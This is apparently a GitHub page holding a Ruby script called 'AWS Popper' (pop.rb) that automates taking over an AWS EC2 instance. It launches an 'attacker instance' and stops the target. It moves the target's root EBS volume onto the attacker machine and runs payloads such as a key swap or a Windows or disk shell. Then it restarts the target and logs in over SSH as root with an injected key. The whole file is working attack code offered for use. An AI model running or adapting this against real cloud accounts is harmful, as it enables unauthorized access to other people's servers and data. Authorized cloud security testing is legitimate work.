-
Notifications
You must be signed in to change notification settings - Fork 0
/
pop.rb
153 lines (127 loc) · 3.85 KB
/
pop.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
require 'aws-sdk'
require 'artii'
require 'colorize'
require 'highline/import'
require 'net/ssh'
client = Aws::EC2::Client.new
# ASCII art is fun
ascii = `artii "AWS Popper" --font slant`
puts ascii.white
puts "https://github.com/mike-bailey".yellow
# Optionally list the instances so you can, uh, pop them
enum = ask "Enumerate Instances? [y/N]: "
if enum == "y"
instancelist = client.describe_instances()
instancelist.each { |c| c.reservations.each { |d| d.instances.each { |f|
puts "#{f.instance_id} #{f.state.name} #{f.public_ip_address} #{f.instance_type} Arch: #{f.architecture} Key Name: #{f.key_name}"
}}}
end
instance = ask "Instance ID: "
# Generate key
# TODO: Actually use this to make popaws
`cat /dev/zero | ssh-keygen -q -N ""`
# Upload popaws to AWS so the attacker instance can use it as SSH management
keypair = client.import_key_pair({
key_name: "AWSPOP#{instance}",
public_key_material: File.read("#{Dir.pwd}/popaws.pub"),
})
target = client.describe_instances({
instance_ids: ["#{instance}"]
})
# Get AZ location
targetaz = target.reservations[0].instances[0].placement.availability_zone
# Get public IP address
targetip = target.reservations[0].instances[0].public_ip_address
# Run attacker instance
attacker = client.run_instances({
image_id: "ami-2d39803a",
instance_type: "t2.micro",
min_count: 1,
max_count: 1,
key_name: "AWSPOP#{instance}",
placement: {
availability_zone: targetaz,
},
network_interfaces: [ {
device_index: 0,
associate_public_ip_address: true,
} ]
})
attackid = attacker.instances[0].instance_id
sleep(20)
# Get instance context
attackstuff = client.describe_instances({
instance_ids: ["#{attackid}"]
})
# Get network address of instance
attackip = attackstuff.reservations[0].instances[0].public_ip_address
puts "Attacking from #{attackip}"
# Stop the victim ID
resp = client.stop_instances({
instance_ids: ["#{instance}"]
})
puts "Sleeping instance..."
sleep(90)
# Identified instance volume ID
primaryvol = target.reservations[0].instances[0].block_device_mappings[0].ebs.volume_id
# Detach this instance volume
resp = client.detach_volume({
volume_id: primaryvol,
instance_id: instance
})
# Pause while it's detaching
puts "Sleeping volume..."
sleep(30)
# Attach it to the attacker
takevol = client.attach_volume({
volume_id: primaryvol, # required
instance_id: attackid, # required
device: "/dev/sdx",
})
# Display payload and allow execution of it
puts "Valid Payloads:\nLinux Keyswap\nHD Shell\nWindows Shelling"
payload = ask "Payload to Execute: "
if payload == "Linux Keyswap"
`#{Dir.pwd}/keyswap.sh #{attackip}`
elsif payload == "HD Shell"
`ssh -i #{Dir.pwd}/popaws -o StrictHostKeyChecking=no ubuntu@#{attackip}`
elsif payload == "Windows Shelling"
`#{Dir.pwd}/winshell.sh #{attackip}`
end
# End active attack and switch to cleanup phase
puts "Ending attack in 200sec"
sleep(200)
# Terminate the attacker instance
resp = client.terminate_instances({
instance_ids: ["#{attackid}"]
})
puts "Sleeping attacker box..."
# Remove target EBS volume from attacker
sleep(90)
resp = client.detach_volume({
volume_id: primaryvol,
instance_id: attackid
})
puts "Sleeping volume..."
sleep(60)
# Give original victim back his EBS volume
takevol = client.attach_volume({
volume_id: primaryvol, # required
instance_id: instance, # required
device: "/dev/sda1",
})
# Clean up
resp = client.delete_key_pair({
key_name: "AWSPOP#{instance}",
})
resp = client.start_instances({
instance_ids: ["#{instance}"]
})
sleep(60)
# Refresh target IP idk if this is needed tbh
target = client.describe_instances({
instance_ids: ["#{instance}"]
})
targetip = target.reservations[0].instances[0].public_ip_address
`ssh #{targetip} -i #{Dir.pwd}/popaws -o StrictHostKeyChecking=no root@#{targetip}`
`ssh #{targetip} -i #{Dir.pwd}/popaws -o StrictHostKeyChecking=no ubuntu@#{targetip}`